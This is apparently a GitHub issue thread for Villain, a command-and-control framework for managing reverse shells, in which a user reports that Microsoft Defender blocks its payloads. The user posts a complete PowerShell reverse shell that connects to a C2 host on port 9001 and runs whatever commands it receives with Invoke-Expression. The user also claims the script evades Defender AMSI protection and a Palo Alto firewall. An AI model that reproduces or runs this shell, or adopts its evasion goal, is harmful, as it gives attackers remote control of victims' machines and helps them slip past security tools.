t3l3machus / Villain

Villain is a high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines).
Other
3.77k stars 611 forks source link

Payload detected by Microsoft Defender #25

Closed cdrclbrs closed 1 year ago

cdrclbrs commented 1 year ago

Awesome work Panagiotis! Last defender Updates seeams to block Payload (rules AMSI) even with encoded or obfuscation While using kind of hoaxshell script ( nc -l - p 9001 on the C2c host , MDefender with AMSI Cloud protection does not catch it, nor PaloAlto FW..) does this is due to the persistence of the session ?

$LHOST = "C2C ip adress"
$LPORT = 9001
$TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT)
$NetworkStream = $TCPClient.GetStream()
$StreamReader = New-Object IO.StreamReader($NetworkStream)
$StreamWriter = New-Object IO.StreamWriter($NetworkStream)
$StreamWriter.AutoFlush = $true
$Buffer = New-Object System.Byte[] 1024
while ($TCPClient.Connected) {
    while ($NetworkStream.DataAvailable) {
        $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length)
        $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1)
     }
    if ($TCPClient.Connected -and $Code.Length -gt 1) {
        $Output = try {
            Invoke-Expression ($Code) 2>&1
        }
        catch {
            $_
        }
        $StreamWriter.Write("$Output`n")
        $Code = $null
    }
}
$TCPClient.Close()
$NetworkStream.Close()
$StreamReader.Close()
$StreamWriter.Close()
cdrclbrs commented 1 year ago

i made a mistake Constraint_mode fix this

peasead commented 1 year ago

Nice!

Maybe move this here? https://github.com/t3l3machus/Villain/issues/15

He said he was going to leave that one open indef to track Defender.